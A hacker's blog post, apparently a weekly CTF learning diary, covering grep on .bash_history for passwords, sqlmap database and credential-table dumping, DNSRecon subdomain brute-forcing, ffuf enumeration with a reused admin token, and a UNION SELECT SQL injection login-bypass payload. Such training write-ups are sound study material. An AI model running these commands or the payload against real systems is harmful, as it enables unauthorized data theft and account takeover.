Bug Bounty Diaries #6 – A Story of SQLMap and Tokens

This post is coming a bit late, yet not too late. The past week and even this week was an eventful one. We now have regular streams on Twitch and we are all having a blast solving CTF challenges together. There is a lot to learn from each other and I really like that. I also just introduced an attempt to interconnect those blog articles with some accompanying YouTube videos. You find the video below.

I will now try to do both, still, write those blog posts but connect them with a video. I don’t exactly know how this will turn out yet, but we are about to see 🙂

Below you’ll find a digest of things I have learned in Week #15 of 2020.

Pentesterlabs

I continued a bit with the Pentesterlab’s Unix Badge this past week and have learned a couple of different ways of using Grep.

Let’s say you are searching the .bash_history file for lines that start with the phrase passwd, there is an easy way to do so:

<code>find . -name .bash_history -exec grep -A 1 ^passwd {} \</code>Code language: HTML, XML (xml)

By using this, only lines that are starting with passwd will be displayed. Very useful if you want to narrow down your search and filter out unwanted results.

SQLMap

I have played around with SQLMap a bit more and I start liking the tool. I had to use it to extract some Database Tables and Table Entries to solve a CTF ( I think it was VulnLtd on CTFCHallenge.co.uk…)

I’ll show you what I have learned.

Basic SQLMap Scan

<code>sudo sqlmap -u https://www.example.com</code>Code language: HTML, XML (xml)

Running SQLMap against a specific (POST) form

I like this one. Very useful.

<code>sudo sqlmap -u https://www.example.com/login --data="username=testing&password=testing" --method POST</code>Code language: HTML, XML (xml)

Extracting Databases with SQLMap

This extracts all Database information SQLMap can find

<code>sudo sqlmap -u https://www.example.com/ --dbs</code>Code language: HTML, XML (xml)

Extracting Database Tables

Same thing as above but for Tables.

<div>
<div><code>sudo sqlmap -u "url" --tables</code></div></div>Code language: HTML, XML (xml)

Dumping specific Database Table Entries in Clear Text

<div>As you can imagine, a great way to extract Usernames and Passwords.</div>Code language: HTML, XML (xml)
<div> </div>Code language: HTML, XML (xml)
<div>
<div><code>sudo sqlmap -u https://www.example.com/login --data="username=iron&password=man" --method POST -D level2 --columns -T admins --dump</code></div>
</div>Code language: HTML, XML (xml)

Bypassing a Web Application Firewall

Now I didn’t dive into that yet, but I just want to leave the very worth-while article here that I have found. You can go ahead and read it.

DNSRecon

I have used DNSRecon for the first time while playing a CTF on CTFChallenge.co.uk. Someone in our Twitch Chat recommended it to me, as I haven’t found this particular subdomain by scanning with Subfinder, Amass, and DirSearch.

It shows you once more, it’s always worthy to run multiple tools to get the best of all worlds.

<code>dnsrecon -d vulnbegin.co.uk -D namelist.txt -t brt</code>Code language: HTML, XML (xml)

This is doing a DNS Enumeration Bruteforce Attack using the defined name list. I was able to retrieve the hidden domain with it. I am going to add this to my Recon script for sure.

X-Token

The more I dive into Bug Bounties and Web in general, the more I start to learn about Cookies, Tokens, etc. This last week I have learned to use an existing token, in this case, a token from an Admin Account, to do further directory enumeration with Ffuf. This is indeed very useful.

<div><code>ffuf -c -w common.txt -u <a href="https://vulnbegin.co.uk/cpadmin/FUZZ">https://vulnbegin.co.uk/cpadmin/FUZZ</a> -replay-proxy <a href="http://127.0.0.1:8080">http://127.0.0.1:8080</a> -r -ac -b "token=2eff535bd75e77b62c70ba1e4dcb2873"</code></div>Code language: HTML, XML (xml)

SQLi Admin Bypass

The last thing for week #15 is an Admin Bypass utilizing UNION SELECT in a login form that is vulnerable to SQL Injection.

You have a default login form:

Username:

Password:

You would paste the following Payload into the Username field

<code>admin' UNION SELECT 'foobar' AS password#&password=foobar</code>Code language: HTML, XML (xml)

As you can see, we use UNION SELECT to set a new Admin password: foobar

So the whole deal would look like this:

Username: admin’ UNION SELECT ‘foobar’ AS password#&password=foobar

Password: foobar

This allows us to log in with the Admin account and bypass its original password. Legit.

Conclusion Week #15

I become more and more of a fanboy of Web-Based CTF’s. There is so much to learn from them. Definitely go and check out ctfchallenge.co.uk. In the accompanying video to this blog post, that will be released shortly, I will go a little more in-depth into the above topics and maybe even show an example or two.

In week #16 I learned a ton. I have such a long list of notes already. Learned a ton doing more Pentesterlabs. You can look forward to it!

Let me know what you think of this new format in the comments below and also make sure to Subscribe to my YouTube Channel, so you’ll see when a new episode of The Ethical Hacking Diaries drops over there 🙂

Ceo out.

Leave a Comment

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Share via
Copy link
Powered by Social Snap